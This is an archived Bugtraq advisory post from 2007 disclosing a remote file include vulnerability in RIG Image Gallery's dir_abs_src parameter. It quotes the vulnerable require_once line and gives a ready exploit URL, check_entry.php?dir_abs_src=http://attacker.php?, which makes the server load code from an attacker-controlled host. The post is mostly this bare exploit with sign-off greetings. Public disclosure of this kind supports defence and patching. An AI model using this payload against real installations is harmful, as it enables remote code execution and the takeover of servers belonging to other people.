[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

RIG Image Gallery (dir_abs_src) Remote File Include Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: RIG Image Gallery (dir_abs_src) Remote File Include Vulnerability
From: ilkerkandemir@xxxxxxxxx
Date: 30 Jul 2007 19:09:56 -0000

-------------------------------------------------------------------------------------------------------------------

MEFISTO PreSents...


Script: RIG Image Gallery
Script Download: http://sourceforge.net/project/showfiles.php?group_id=54367

Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>

Code:
require_once(rig_check_src_file($dir_abs_src . "entry_point.php"));

-------------------------------------------------------------------------------------------------------------------

Exploit:  check_entry.php?dir_abs_src=http://attacker.php?

-------------------------------------------------------------------------------------------------------------------

Tnx:H0tturk,Ajann,Dumenci,Str0ke

Prev by Date: [SECURITY] [DSA 1342-1] New xfs packages fix privilege escalation
Next by Date: phpWebFileManager v0.5 (PN_PathPrefix) Remote File Include Vulnerability
Previous by thread: [SECURITY] [DSA 1342-1] New xfs packages fix privilege escalation
Next by thread: phpWebFileManager v0.5 (PN_PathPrefix) Remote File Include Vulnerability
Index(es):
- Date
- Thread